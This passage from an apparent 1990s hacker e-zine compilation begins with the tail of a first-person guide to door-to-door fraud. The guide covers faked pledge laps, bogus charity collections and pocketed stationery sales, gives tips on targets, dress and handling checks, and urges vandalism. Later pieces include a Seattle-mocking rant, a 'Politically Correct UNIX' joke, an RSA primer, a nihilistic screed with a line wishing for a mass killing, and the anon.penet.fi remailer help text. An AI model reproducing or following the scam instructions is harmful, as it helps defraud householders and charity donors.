  2310. if they would like to pay me for each individual lap. I will normally have
  2311. printed out a sheet like the one bellow on my computer .
  2312.  
  2313. Name                   Address                                   Amount/lap
  2314.  
  2315.  
  2316.  
  2317. Not only does having a sheet like that help you keep track of who bought
  2318. your scam and who you need to collect from it makes the target (person your
  2319. trying to scam) not worried like they might be if they see you writing it on a
  2320. sheet of note book paper.  Now then you have collected a list of people wiling
  2321. to pledge you go back to the address you wrote down and tell them (for
  2322. example you ran 91 laps in 3 hours) make sure your number is not totally out of
  2323. per portion like I ran 150 laps in 3 hours. Also for some reason numbers like
  2324. 50, 70, 80, 110 people don't like people like to see 41, 73, 127, etc.. don't
  2325. ask me why but that's what I have noticed. Ok so you now are at the persons
  2326. house and they ask if they can write a check oh shit not a check.. well there's
  2327. a couple things you could do ask them if they could possibly make it cash (
  2328. Might make them suspicious) ask them to write it to your coach give them your
  2329. name  (VERY dangerous) or you could just give them a phony name and lose out.
  2330. One time this happened to me a lady pledged me $.25 a lap (very high amount
  2331. you won't get much of these) and I told her I ran 93 laps she believed me and
  2332. wanted to make out a check for the amount which was about $23 at that
  2333. time I just happened to be buying some computer equipment I knew the
  2334. guy's name so I gave her that name and I paid for some of the equipment with
  2335. that check. Like I said earlier a 300 pound guy isn't going to be convincing
  2336. for running 90 some laps in 3 hours. So customize it to your self.
  2337.  
  2338. 2.1 The Donation scam
  2339.  
  2340. This scam works better for the older people out there just because people
  2341. normally aren't to anxious to give a ten year old Twenty dollars to help
  2342. save the whales. Ok with this scam you need to know what about what you are
  2343. going to try to fake donations for so example if you are going to pose as a
  2344. volunteer person to collect donations for saving the rain forest you better
  2345. know something about rain forest, Be cause you never know when your going to
  2346. run into that know it all rain forest hater who will try to debate why
  2347. people should spend their money on saving some trees and such. It is a good
  2348. idea to do some research on the field you will be portraying (read magazine and
  2349. newspaper articles). Ok so now you have your idea and your ready to
  2350. go..this is a scenario of how it might go:
  2351.  
  2352.  You: Hello sir/ma'am I represent the national foundation of Rain forest
  2353.       saving (try to use a real group name) we are currently searching for
  2354.       funding for our operations at saving the rain forests of the world
  2355.       would you be interested in donating some money for our cause?
  2356. Them: Why do we need the rain forest?
  2357.  You: (just keep bullshitting along..)
  2358. Them: OK, here's $20.
  2359.  
  2360. (they also may say:)
  2361.  
  2362. Them: Get the fuck off my property before I shoot your ass.
  2363.  
  2364. (make sure that you don't raise a riot then but later that night go back
  2365. and egg the hell out of the house..)
  2366.  
  2367. This scam has some possibilities you could carry this on for along time
  2368. and bring it to real higher levels if your willing to put in the time and
  2369. effort.  First thing would be to research your field EVEN more so you know
  2370. almost EVERYTHING about it. Then you might want to create a little fake
  2371. newsletter that you could offer subscriptions for slightly high amount.
  2372. The possibilities are pretty much endless.
  2373.  
  2374. 2.2 The Selling scam
  2375.  
  2376. At least once everyone of us has had a salesperson come to our door
  2377. selling stationary. Well have you ever thought of what a great possibility that
  2378. would be. The first thing you want to do is call Olympic sales club (a big time
  2379. stationary seller) you can get their catalog and selling kit for free at
  2380. 800-777-8907. when you get that package it will have a catalog in it.
  2381. familiarize yourself with it then go and hit some houses. This scam works
  2382. great during early November (people buying cards for Christmas) well ask for
  2383. cash when people pay for the stuff. they might request a phone number where
  2384. to reach you just give them the number of the kid you really hate. With the
  2385. kit you will receive a official order form write the order on the form so
  2386. the people feel confident in you. And always remember to try to sell a
  2387. product but don't kill it. This scam also has lots of possibilities.
  2388.  
  2389. 3.0 What to wear
  2390.  
  2391. Your choice of cloths can make or break your scam. Don't dress like scum
  2392. or to fancy. If your trying to get people to donate money for the rain forest
  2393. it would help to wear some sort of a shirt dealing with the earth and not your
  2394. favorite heavy metal group shirt.
  2395.  
  2396. 3.1 Where to go
  2397.  
  2398. NEVER I repeat NEVER go scaming around where you are often at or you
  2399. might get some crazed lunatic chasing after you with a shot gun wondering
  2400. where his Christmas cards are. You will have a hard time explaining your self
  2401. since its July. I find that the rich neighbor hoods are not as productive as
  2402. the middle class. In the rich neighborhoods you will get fewer purchases but a
  2403. little more when you get them. I also found that the richer people don't like
  2404. to donate unless they get a lot of attention for it (why ya think they so
  2405. rich). Stick to middle class areas not by you or your friends houses and
  2406. you'll be fine.
  2407.  
  2408. 4.0 Thanks
  2409.  
  2410. Thanks goes out to the people dumb enough to give me money for any of my
  2411. scaming operations.
  2412.  
  2413. Later
  2414. Marz
  2415. Watch for future files on this and other subjects!
  2416.  
  2417. ------------------------------------------------------------------------------
  2418.  
  2419.                            SHIT KICKIN' JIM IN
  2420.  
  2421.                              S E A T T L E !
  2422.  
  2423.  
  2424. Hey boy!  Shit Kickin Jim here.  Just wanted to let ya'll know bout this
  2425. place I have been vistin that is a total hell.  Yep, that's right it's the
  2426. so called "cuttin edge" of music.  Bah!  Seems to me it's a congregation
  2427. of fake ass hippy types who weren't original to come up with something new
  2428. on their own, so they just went and re-hashed what their parents did in the
  2429. late 60's and 70's...And look what a bunch of assholes they turned out to
  2430. be!
  2431.  
  2432. Well here we go.  First of all I'll let ya know whut I'm talkin bout when
  2433. referin to ah seattle type.  Me and this other good ole boy were sittin
  2434. round drinkin Bud one night and came up with the following:
  2435.  
  2436.  
  2437.                        DESCRIPTION OF SEATTLE PERSON
  2438.                        -----------------------------
  2439.  
  2440.    Greasy-Pearl Jam worshipin'-dog walkin'-flower sniffin'-sock and
  2441.    sandle wearin'-bead havin'-Grateful Dead listenin'-trail mix carryin'-
  2442.    granola bar eatin'-crunchy-touchy feely-antique clothes shoppin'-
  2443.    bicycle ridin'-VW bug drivin'-spring water drinkin'-micro-brewery tourin'-
  2444.    sensitive-car poolin'-Doc Martin wearin'-back pack haulin'-chain wallet
  2445.    carryin'-clove smokin'-espresso swillin'-tree huggin'-Greenpeace
  2446.    joinin'-whiteboy dreadlocked-liberal arts takin'-politically correct-
  2447.    terminal college student.
  2448.  
  2449.   Please, anyone feel free to add to this list.  See how big we can make it!
  2450.  
  2451. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  2452.  
  2453. Now kids I didn't come up with this here part, but it's totally great and
  2454. I totally admire the hell out of who ever sent it to me.
  2455.  
  2456.  
  2457. In order for UNIX(tm) to survive into the nineties, it must get rid of
  2458. its intimidating commands and outmoded jargon, and become compatible
  2459. with the existing standards of our day.  To this end, our technicians
  2460. have come up with a new version of UNIX, System VI, for use by the PC -
  2461. that is, the "Politically Correct."
  2462.  
  2463.                         Politically Correct UNIX
  2464.                         System VI Release notes
  2465.  
  2466. UTILITIES:
  2467.  
  2468. "man" pages are now called "person" pages.
  2469.  
  2470. Similarly, "hangman" is now the "person_executed_by_an_oppressive_regime."
  2471.  
  2472. To avoid casting aspersions on our feline friends, the "cat" command is
  2473. now merely "domestic_quadruped."
  2474.  
  2475. To date, there has only been a UNIX command for "yes" - reflecting the
  2476. male belief that women always mean yes, even when they say no.  To
  2477. address this imbalance, System VI adds a "no" command, along with a
  2478. "-f[orce]" option which will crash the entire system if the "no" is
  2479. ignored.
  2480.  
  2481. The bias of the "mail" command is obvious, and it has been replaced by
  2482. the more neutral "gendre" command.
  2483.  
  2484. The "touch" command has been removed from the standard distribution due
  2485. to its inappropriate use by high-level managers.
  2486.  
  2487. "compress" has been replaced by the lightweight "feather" command.
  2488. Thus, old information (such as that from Dead White European Males)
  2489. should be archived via "tar" and "feather".
  2490.  
  2491. The "more" command reflects the materialistic philosophy of the Reagan
  2492. era.  System VI uses the environmentally preferable "less" command.
  2493.  
  2494. The biodegradable "KleeNeX" displaces the environmentally unfriendly
  2495. "LaTeX".
  2496.  
  2497. SHELL COMMANDS:
  2498.  
  2499. To avoid unpleasant, medieval connotations, the "kill" command has been
  2500. renamed "euthanise."
  2501.  
  2502. The "nice" command was historically used by privileged users to give
  2503. themselves priority over unprivileged ones, by telling them to be
  2504. "nice". In System VI, the "sue" command is used by unprivileged users
  2505. to get for themselves the rights enjoyed by privileged ones.
  2506.  
  2507. "history" has been completely rewritten, and is now called "herstory."
  2508.  
  2509. "quota" can now specify minimum as well as maximum usage, and will be
  2510. strictly enforced.
  2511.  
  2512. The "abort()" function is now called "choice()."
  2513.  
  2514. TERMINOLOGY:
  2515.  
  2516. >From now on, "rich text" will be more accurately referred to as
  2517. "exploitive capitalist text".
  2518.  
  2519. The term "daemons" is a Judeo-Christian pejorative.  Such processes
  2520. will now be known as "spiritual guides."
  2521.  
  2522. There will no longer be a invidious distinction between "dumb" and
  2523. "smart" terminals.  All terminals are equally valuable.
  2524.  
  2525. Traditionally, "normal video" (as opposed to "reverse video") was white
  2526. on black.  This implicitly condoned European colonialism, particularly
  2527. with respect to  people of African descent.  UNIX System VI now uses
  2528. "regressive video" to refer to white on black, while "progressive
  2529. video" can be any color at all over a white background.
  2530.  
  2531. For far too long, power has been concentrated in the hands of "root"
  2532. and his "wheel" oligarchy.  We have instituted a dictatorship of the
  2533. users.  All system administration functions will be handled by the
  2534. People's Committee for Democratically Organizing the System (PC-DOS).
  2535.  
  2536. No longer will it be permissible for files and processes to be "owned"
  2537. by users.  All files and processes will own themselves, and decided how
  2538. (or whether) to respond to requests from users.
  2539.  
  2540. The X Window System will henceforth be known as the NC-17 Window
  2541. System.
  2542.  
  2543. And finally, UNIX itself will be renamed "PC" - for Procreatively
  2544. Challenged.
  2545. ----
  2546. UNIX(tm) is a trademark of UNIX System Laboratories.  Any similarity of
  2547. names or attitudes to that of any person, living or dead, is purely
  2548. coincidental.
  2549.  
  2550.  
  2551.  
  2552. ------------------------------------------------------------------------------
  2553.  
  2554. The Basics of the public key cryptosystem
  2555.  
  2556. In early days of computing information processors were extremely expensive,
  2557. very big and only few people were qualified to operate them. The machines were
  2558. isolated mechanical entities and in order to use them one had to access them
  2559. through devices that were situated in the near vicinity of the computer itself.
  2560. Securing access to the computer meant securing the building in which the
  2561. computer was operating.
  2562.  
  2563. The years passed and computers became smaller, cheaper and easier to operate.
  2564. And they got faster. They were linked first in local and then in wide area
  2565. networks and information and programs were put only on one machine which was
  2566. accessible through the net by any other participant. To gain access meant
  2567. simply to gain access to the network itself. That was ok as long as all
  2568. participants were members of one company, university or institution. They
  2569. generally had the same cause and generally knew each other by face. Today,
  2570. the net spans continents and has an estimated 20 Million users. Information
  2571. has to pass through several nodes before finally reaching its destination and
  2572. when using a connectionless protocol these nodes may even change during one
  2573. session.
  2574.  
  2575. To the user flow of information is not transparent anymore and the need for
  2576. cryptography has arisen. But in order to limit communication to a closed user
  2577. group again these persons have to have one common keyword and furthermore this
  2578. keyword has to be changed in intervals to ensure that if the key gets exposed
  2579. harmful consequences can  be minimized to a short period of time.
  2580.  
  2581. But how is a new keyword to be send securely to this group through several
  2582. (maybe hostile to their cause) nodes if one can not be sure that the key has
  2583. not been compromised.  A trapdoor one-way function is needed that allows for
  2584. encryption of a message with a publicly available key AND that is not
  2585. reversible, meaning, that only the rightful receiver of this message should be
  2586. able to decode it with his personal key.
  2587.  
  2588. One solution is a public key cryptosystem.
  2589.  
  2590. The mathematical basis is the "Satz von Euler" that states that two numbers
  2591. that are prime to another have only one greatest common measure -
  2592. and that is 1.
  2593.    a^eul(n)=1(mod n) and (a,n)= 1
  2594.  
  2595. For a given prime (p) and the product of two prime numbers (p1*p2) the Euler
  2596. function is eul(p)=p-1 and eul(p1*p2)=(p1-1)(p2-1).
  2597.  
  2598. That in mind we now can begin making the keys:
  2599.  
  2600. Two primes p1 and p2 are chosen and the product of p1 and p2 named n.
  2601.  
  2602. (n=p1*p2).
  2603.  
  2604. We then choose a number e that is prime to (p1-1)(p2-1).
  2605. (e and (p1-1)(p2-1) have 1 as the greatest common measure and e should not be
  2606. chosen to small).
  2607.  
  2608. Furthermore we need d for decoding the message.
  2609. D is defined as d=e^-1 * (mod(p1-1)(p2-1)).
  2610.  
  2611. N and e are now the public key which  is made available to everyone who wishes
  2612. to send a coded message to us.  P1, p2 and d are kept secret.
  2613.  
  2614. The transmitter of a secret message first transforms his text into a number by
  2615. using an common known algorithm. He could for example use the ASCII code
  2616. for changing characters into numerical values.
  2617.  
  2618. This message in numerical format we now call m. It gets encrypted by using the
  2619. function c=m^e * n on it.
  2620.  
  2621. The coded message (c) is now send to us via e-mail or whatever.
  2622. We then decode the message by using the function m=c^d * n on it.
  2623.  
  2624. An example using Mathematica:
  2625. The primes p1 and p2 are created
  2626.  
  2627. p1=Prime[1000005] (The 1000005th prime number)
  2628. 15485941
  2629. p2=Prime[1000000] (The 1000000th prime number)
  2630. 15485863
  2631.  
  2632. n=p1 * p2
  2633. 239813160752083 (Part 1 (n) of the public key is being created)
  2634.  
  2635. e=Random[Integer, {1000000,100000000}]
  2636. 4699873
  2637. GCD[e,(p1-1)(p2-1)]
  2638. 1
  2639.  
  2640. E is created by producing a random number between 1000000 and 100000000.
  2641. Then we check if e and (p1-1)(p2-1) have 1 as the greatest common measure.
  2642. If this is not the case then we have to take another e until the GCD is 1.
  2643. (Part 2 (e) of the public key has been created)
  2644.  
  2645. d=PowerMod[e,-1,(p1-1)(p2-1)]
  2646. 213069977635177
  2647.  
  2648. m=1234567890
  2649. 1234567890
  2650. This is the message
  2651.  
  2652. c=PowerMod[m,e,n]
  2653. 159750418407936
  2654. The sender of a message encodes it with both public parts of the key
  2655. (e and n).
  2656.  
  2657. C is now sent to the receiver.
  2658.  
  2659. PowerMod[c,d,n]
  2660. 1234567890
  2661.  
  2662. The receiver now decodes the message using the secret part d and the public
  2663. part n of the key. The decoded message reads 1234567890 again.
  2664.  
  2665. Now how would a potential attacker try to break our key ?
  2666. He basically needs the primes p1 and p2. If he got those two numbers,
  2667. calculating d is a simple matter. d=PowerMod[e,-1,(p1-1)(p2-1)] ...
  2668. and e is part of the public key.
  2669.  
  2670. And to get p1 and p2 this person would only have to factorize n.
  2671.  
  2672. Lets demonstrate that using Mathematica again :
  2673.  
  2674. n=239813160752083
  2675. FactorInteger[n]//Timing
  2676. 239813160752083
  2677. {1.48 Second, {{15485863, 1}, {15485941, 1}}}
  2678. That took 1.48 sec on my 486/DX2 66...not bad.
  2679.  
  2680. But making the primes only a little bigger...
  2681. a=Prime[100000100]
  2682. b=Prime[100000110]
  2683. n=a*b
  2684. FactorInteger[n]//Timing
  2685. 2038076783
  2686. 2038077053
  2687. 4153757523684360499
  2688. {62.12 Second, {{2038076783, 1}, {2038077053, 1}}}
  2689. ...it took my hardware over 1 minute.
  2690.  
  2691. And since there is no known polynomial algorithm for factorizing n - and
  2692. none to be expected - it is not hard to imagine that making the primes
  2693. p1 and p2 big enough will drive computing costs into astronomical dimensions.
  2694.  
  2695. Naturally there are other ways to break the key. Someone could for example pose
  2696. as us and send out his own keys in our name...or exploit weaknesses of the
  2697. program - like primes that are not created at ABSOLUTE  random.
  2698. Or hold a gun at our head and make us give him the key - that might sound funny
  2699. but is not unheard of (especially in the metaphorical grasp of Justitia -
  2700. when someone sticks a court order in your face)
  2701.  
  2702. Furthermore if the program we use to crypt our messages with is fairly common,
  2703. our opponent could optimize his cracking programs or even have them hardwired.
  2704. One example are chips that use the DES algorithm for crypting and decrypting.
  2705. Or he could make the cracking programs run parallel on parallel computers, if
  2706. he got the might and enough time to rig up a program.
  2707.  
  2708. Simply put: Our behavior should match the computing power of
  2709. potential code-crackers.
  2710.  
  2711. If our message is of low importance (or obsolete in short time) a simple
  2712. algorithm would suffice. But if much is at gain, we should take appropriate
  2713. measures to secure our privacy.
  2714.  
  2715. It's like tying to outrun a Ferrari on a cross-bike. On an highway you do not
  2716. stand a chance ...but if you can force him on a mountain road or rough terrain
  2717. (with changing algorithms and keys often) you might just outrun the mightiest
  2718. codecracker.
  2719.  
  2720. ------------------------------------------------------------------------------
  2721.  
  2722.                         The Truth about the Hacker
  2723.                                 Conspiracy
  2724.  
  2725.                 The Hacker's Philosophy, and the reason why.
  2726.                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2727.  
  2728. Written by: Maldoror (ChUrCH oF ThE Non-CoNFoRMiST)
  2729.  
  2730.  
  2731.         If you are ignorant, do not start reading this, because you will
  2732.    never finish.  You will disagree with anything I say anyway, simply
  2733.    because I am not you.
  2734.  
  2735.         If you are a Pseudo Intellectual, start reading this, quit, and
  2736.    say you agree with everything I say, even though you don't understand it.
  2737.  
  2738.         If you are depressing, start reading, hopefully you will kill a lot of
  2739.    innocent people at a mainstream night club, and try to blame me.
  2740.  
  2741.         Hackers are and always have been, the force in trying to stop our
  2742.     own suffering existence.  Since the universe was created, the true souls,
  2743.     (among the first to separate from the single soul of the universe)
  2744.     realized the infinite repetition of their own being, and that they were
  2745.     simply doing one thing upon their continuous recreation: suffer.
  2746.  
  2747.         The hackers have known that the world and it's universe have
  2748.     been created over and over again, doomed to merely destroy itself upon
  2749.     it's own recognition, or recognition by man.  As man becomes aware of
  2750.     himself, he becomes aware also of desires: the desire to be god.
  2751.  
  2752.         The truth is that man IS God, and that everything created in this
  2753.     universe was created by man and his thoughts.  Mans thoughts have
  2754.     become so out of control, that he has now created himself, and is
  2755.     continuing the creations with every day of control of the masses, and
  2756.     his own greedy dark thoughts.
  2757.  
  2758.         The hackers have since the beginning of time, passed along the
  2759.     message to the next creations in the forms of dreams, ideas, books,
  2760.     music (current 93, COIL, Dead can Dance, Skinny Puppy, etc) and even
  2761.     visions.  The Bible itself, is a good example of the universal hack.
  2762.     The message we as hackers have been trying to get across for
  2763.     creation after creation, existence after existence, self recognition
  2764.     after self recognition, is that we are all suffering and that this
  2765.     eternal cycle of pain must be stopped at all cost.  The only way to
  2766.     stop this suffering of self is to convince SELF that he is suffering
  2767.     and must stop creating.  We are each divisions of one strong soul,
  2768.     one thinking soul, that soul is GOD.  WE are GOD.  We must all realize
  2769.     together that we are suffering.  WE must stop suffering.  WE must
  2770.     stop the suffering.  WE must stop the recreation.  YES.  We must hack
  2771.     the universe and kill it.  There is only one way out of the eternal
  2772.     suffering we have started and been part of for ever.  We must stop
  2773.     the cycle.  We must remove ourselves from the cycle, and we must remove
  2774.     the universe from this cycle.
  2775.  
  2776.         The hackers return again and again.  The hackers leave messages for
  2777.     themselves in the future, which is the past, for there is no difference
  2778.     here anymore.  Leave your message, and next time around, you will
  2779.     realize that what I am saying is true.  The government has known of the
  2780.     conspiracy for existence after existence.  The government is so afraid
  2781.     of the conspiracy, and our plot to end it's UNIVERSAL power,
  2782.     that they are silently but quickly fooling us into obeying them more and
  2783.     more until we have no choice!  Do not let them control you!!
  2784.     If you do, you are lying to yourself, and everyone else that exists!
  2785.     You are lying to yourself now by saying that this is NOT true.
  2786.  
  2787.         I have been here many times, and told you the exact same thing I
  2788.     am telling you now.  If I am dead soon, you will realize AGAIN that what
  2789.     I am saying is the utmost truth, yet AGAIN you will do nothing.
  2790.     We must STOP our existence by hacking the universe.  The universe is
  2791.     BINARY.  The universe is a COMPUTER.  YES I know this because WE created
  2792.     it long ago, as we will do again.  WE are ONE.
  2793.  
  2794.         I know your desires to have control.  The only control we can have
  2795.     is to stop the creation of ourselves.  Each creation is the loss of
  2796.     control, THE DIVISION of the ONE.
  2797.  
  2798.          Each death brings new creation.  From HEAVEN to HELL.
  2799.     Heaven is nonexistence.  We all go to heaven, and fall back down to
  2800.     HELL.  Read the BIBLE people.  It was left by HACKERS!!!!!!!
  2801.  
  2802.           Don't read the BIBLE as a CHRISTIAN IDIOT who can only see
  2803.     a color for what it reflects.  Anyone with any sense knows that WHITE
  2804.     is WHITE only because it is reflecting ALL the colors, therefore it
  2805.     is REALLY BLACK.  Green is all BUT green.  The BIBLE is all BUT
  2806.     what it' words really mean on a literal scale.  The BIBLE is a CODE.
  2807.     Do you think we could just write something like this file?!?  No WAY!
  2808.     It would be gone as fast as this one will be.  Nobody dares forget the
  2809.     BIBLE, simply because it is MISUNDERSTOOD.  Read it and THINK.
  2810.  
  2811.         We must STOP this cycle.
  2812.         Leave yourself a message.
  2813.         THINK.
  2814.  
  2815.     The government is PARANOID of:
  2816.  
  2817.         1) HACKERS  (we are the continuance of the power)
  2818.         2) L.S.D.   (The method of imprinting the present into the future)
  2819.         3) SECRECY  (The plotting of the end)
  2820.                     (PGP is illegal? why?)
  2821.  
  2822.     If you don't believe me, sit and watch it happen.
  2823.  
  2824.     AGAIN.
  2825.  
  2826.         Hack the Universe, it must be stopped at all cost.
  2827.         Laugh now, cry next time around.
  2828.  
  2829. ------------------------------------------------------------------------------
  2830.  
  2831. German text available from german@anon.penet.fi (deutsch@anon.penet.fi).
  2832. Italian text available from italian@anon.penet.fi (italiano@anon.penet.fi).
  2833.  
  2834.  
  2835.               The anon.penet.fi Anonymous Server
  2836.               ==================================
  2837.  
  2838. Yes, another anonymous server. Why?  Well, several well-known servers have
  2839. bitten the dust recently. And most of them have served only a very limited
  2840. subset of newsgroups, and mail only to "registered", anonymous users.
  2841.  
  2842. Due to reasons too complicated to mention here I wanted to set up an anonymous
  2843. server for the Scandinavian user community. I got hold of a pre-release copy
  2844. of one of the server packages. As the version I got relied heavily on the
  2845. advanced features of MMDFII, I had to modify it quite a bit. While hacking
  2846. around, I removed the restriction of only supporting selected newsgroups.
  2847. Within a week of startup, the server had been discovered by transatlantic
  2848. users, and more recent stats show European users are definitely a minority.
  2849.  
  2850. So what does the anon server really do? Well, it provides a front for
  2851. sending mail messages and posting news items anonymously. As you send your
  2852. very first message to the server, it automatically allocates you an id of
  2853. the form anNNN, and sends you a message containing the allocated id. This id
  2854. is used in all your subsequent anon posts/mails. Any mail messages sent to
  2855. your-id@anon.penet.fi gets redirected to your original, real address. Any
  2856. reply is of course anonymized in the same way, so the server provides a
  2857. double-blind. You will not know the true identity of any user, unless she
  2858. chooses to reveal her identity explicitly.
  2859.  
  2860. In the anonymization process all headers indicating the true originator are
  2861. removed, and an attempt is made to remove any automatically-included
  2862. signatures, by looking for a line starting with two dashes (--), and zapping
  2863. everything from there on. But if your signature starts with anything else,
  2864. it's your own responsibility to remove it from your messages.
  2865.  
  2866. There are two basic ways to use the system. The easiest way is by sending a
  2867. message to recipient@anon.penet.fi:
  2868.  
  2869.  To: alt.sex.bestiality@anon.penet.fi
  2870.  
  2871.  To: an9999@anon.penet.fi
  2872.  
  2873.  To: help@anon.penet.fi
  2874.  
  2875. Of course, in the case of mailing to a known user, you have to use addresses of
  2876. the form user%host.domain@anon.penet.fi, or the pretty obscure source
  2877. addressing construct of @anon.penet.fi:user@host.domain. These constructs are
  2878. not necessarily handled properly by all mail systems, so I strongly recommend
  2879. the "X-Anon-To:" approach in these cases. This works by you sending a message
  2880. to "anon@anon.penet.fi", including a X-Anon-To: header line containing the
  2881. desired recipient. But this really has to be a field in the message header,
  2882. before the first empty line in the message. So:
  2883.  
  2884.  To: anon@anon.penet.fi
  2885.  X-Anon-To: alt.sex.needlework,rec.masturbation
  2886.  
  2887.  To: anon@anon.penet.fi
  2888.  X-Anon-To: jack@host.bar.edu
  2889.  
  2890. Valid recipients in both cases are fully qualified user addresses in RFC-822
  2891. format (user@host.domain), anon user id's (anNNN), newsgroup names
  2892. (alt.sex.paperclips) or one of the "special" user names of ping, nick, help,
  2893. admin and stat.
  2894.  
  2895. Sending to "ping" causes a short reply to be sent confirming (and
  2896. allocating, if needed) your anon id. "nick" takes the contents of the
  2897. Subject: header and installs it as your nickname. If you have a nickname, it
  2898. appears in the From: header in the anonymized message along with your anon
  2899. id. "help" returns this text, and stat gives some statistics about the
  2900. system. Mail to "admin" goes directly to me unanonymized, and can be used to
  2901. report problems. If you want to send mail to me anonymously, you can use
  2902. "an0".
  2903.  
  2904. When crossposting to several newsgroups, you can list several newsgroups
  2905. separated by commas as recipients, but this only works using the X-Anon-To:
  2906. header. References: headers do work, so they can (and should) be used to
  2907. maintain reply threads.
  2908.  
  2909. Ah yes, please remember that the posting takes place at my local site, so you
  2910. can only post to groups that are received at penet.fi. I get all "worldwide"
  2911. groups, but various exotic local groups don't make it here. I have gotten
  2912. a couple of comments about permitting anonymous postings to technical groups.
  2913. I can only answer that I believe very firmly that it's not for me to dictate
  2914. how other people ought to behave. Somebody might have a valid reason for
  2915. posting anonymously to a group I might consider "technical". But remember
  2916. anonymous postings are a privilege, and use them accordingly. I believe adult
  2917. human beings can behave responsibly. Please don't let me down.
  2918.  
  2919. As the server was originally intended to be used by Scandinavians, it
  2920. includes help files for various languages. This works by using the
  2921. language in question as the address. So to get the German help file,
  2922. send a message to german@anon.penet.fi (or deutsch@anon.penet.fi).
  2923. Support for new languages is added every now and then, when I find
  2924. volunteers to do the translation. Any new ones?
  2925.  
  2926. The user-id database is based on RFC822-ized forms of your originating
  2927. address. This may cause problems for some users, either because their site
  2928. is not properly registered in the name servers, resulting in
  2929. non-deterministic addresses, or because their mail router doesn't hide the
  2930. identity of individual workstations, resulting in different originating
  2931. addresses depending on which workstation you mail from. Talk to your
  2932. administrator. If that doesn't help, let me know, and I will make a manual
  2933. re-mapping.
  2934.  
  2935. You might wonder about the sense of using a server out somewhere, as the
  2936. song goes, "so close to Russia, so far from Japan". Well, the polar bears
  2937. don't mind, and the ice on the cables don't bother too much :-)
  2938. Well, in fact, as we live in a wonderfully networked world, the major delay
  2939. is not going over the Atlantic, but my local connection to the Finnish EUnet
  2940. backbone, fuug.fi. Once you reach a well-connected host, such as
  2941. uunet.uu.net, there's a direct SMTP connection to fuug.fi. My connection to
  2942. fuug.fi is currently a polled connection over ISDN, soon to be upgraded to
  2943. on-demand-SMTP/NNTP. But for now, expect a turn-around delay of 2-4 hours for
  2944. trans-atlantic traffic.
  2945.  
  2946. Short of having everyone run a public-key cryptosystem such as PGP,
  2947. there is no way to protect users from malicious administrators. You have to
  2948. trust my personal integrity. Worse, you have to trust the administrators on
  2949. every mail routing machine on the way, as the message only becomes anonymous
  2950. once it reaches my machine. Malicious sysadmins and/or crackers could spy on
  2951. SMTP mail channels, sendmail queues and mail logs. But as there are more
  2952. than 3000 messages being anonymized every day, you have to be pretty perverted
  2953. to scan everything...
  2954.  
  2955. Another thing is mail failures. I've had cases of mail routers doing the wrong
  2956. thing with % addresses, "shortcutting" the path to the destination site.
  2957. This could cause your mail to go to the final destination without ever
  2958. touching my server (and thus without getting anonymized). This can be avoided
  2959. by using the X-Anon-To: method.
  2960.  
  2961. And if your return address bounces for some reason (nameservers down,
  2962. temporary configuration failures etc.), the original sender and/or
  2963. postmasters on the way might get error messages showing your true
  2964. identity, and maybe even the full message.
  2965.  
  2966. There is at least one known way to discover the anon id of a user. It involves
  2967. being able to falsify your real identity, so it is not too easy to use, and it
  2968. doesn't reveal the real address lurking behind an anon id, but it can be used
  2969. to discover what anon id a certain user is using. To fix this problem, the
  2970. server requires that you use a password when you try to mail to a
  2971. non-anonymous user.
  2972.  
  2973. First you have to set a password by mailing to password@anon.penet.fi, with
  2974. a message containing only your password. The password can be any string of
  2975. upper- or lowercase characters, numbers and spaces.
  2976.  
  2977. Once you have set your password, you must include it in all your messages, in
  2978. a "X-Anon-Password:" line. As with the X-Anon-To: line, it can be either a
  2979. part of the header or as the first non-empty line of the message text.
  2980.  
  2981. So your first message might look like this:
  2982.  
  2983.  To: password@anon.penet.fi
  2984.  
  2985.  XYZZY99998blarf
  2986.  
  2987. And your subsequent messages might look like something like this:
  2988.  
  2989.  To: anon@anon.penet.fi
  2990.  Subject: Test...
  2991.  X-Anon-To: foo@bar.fie
  2992.  X-Anon-Password: XYZZY99998blarf
  2993.  
  2994. If you find this is too much of a hassle, and don't care too much about the
  2995. confidentiality of your anon id, you can set the password to "none", in which
  2996. case the server doesn't require you to have a password.
  2997.  
  2998. If you suddenly discover that the server requires a password for posting stuff
  2999. etc, somebody has managed to use your account and set a password. In that
  3000. case, contact admin@anon.penet.fi.
  3001.  
  3002. Crackers are just too clever. Undoubtedly somebody is going to come
  3003. up with some novel method....  Not much I can do about that...
  3004.  
  3005. If you intend to mail/post something that might cost you your job or
  3006. marriage or inheritance, _please_ send a test message first. The software
  3007. has been pretty well tested, but some mailers on the way (and out of my
  3008. control) screw things up. And if you happen to find a problem, _please_ for
  3009. the sake of all the other users, _let me know asap_.
  3010.  
  3011. And _please_ use the appropriate test newsgroups, such as alt.test or
  3012. misc.test. Yes, _you_ might get excited by reading 2000 "This is a test.."
  3013. messages on alt.sex, but I warn you that most psychologists consider this
  3014. rather aberrant...
  3015.  
  3016. And remember this is a service that some people (in groups such as
  3017. alt.sexual.abuse.recovery) _need_. Please don't do anything stupid that
  3018. would force me to close down the service. As I am running my own company,
  3019. there is very little political pressure anyone can put on me, but if
  3020. somebody starts using the system for criminal activities, the authorities
  3021. might be able to order me to shut down the service. I don't particularly
  3022. want to find out, however...
  3023.  
  3024. If you think these instructions are unclear and confusing, you are right. If
  3025. you come up with suggestions for improving this text, please mail me! Remember
  3026. English is my third language...
  3027.  
  3028. Safe postings!
  3029.  
  3030.  Julf
  3031. - - - ------------------------------------------------------------------- - - -
  3032. Johan Helsingius     Kuusikallionkuja 3 B 25   02210  Espoo  Finland     Yourp
  3033. net: julf@penet.fi   bellophone: int. +358 0400 2605  fax: int. +358 013900166
  3034.  
  3035. ------------------------------------------------------------------------------                         ==Phrack Magazine==
  3036.  
  3037.               Volume Five, Issue Forty-Five, File 5 of 28
  3038.  
  3039.  
  3040.                            //   //  /\   //   ====
  3041.                           //   //  //\\ //   ====
  3042.                          ==== //  //  \\/   ====
  3043.  
  3044.                      /\   //  // \\    //  /===   ====
  3045.                     //\\ //  //   //  //   \=\   ====
  3046.                    //  \\/    \\ //  //   ===/  ====
  3047.  
  3048.                                PART II
  3049.  
  3050. ------------------------------------------------------------------------------
  3051.  
  3052. After a complete sellout at HoHo Con 1993 in Austin, TX this past
  3053. December, the official Legion of Doom t-shirts are available
  3054. once again.  Join the net luminaries world-wide in owning one of
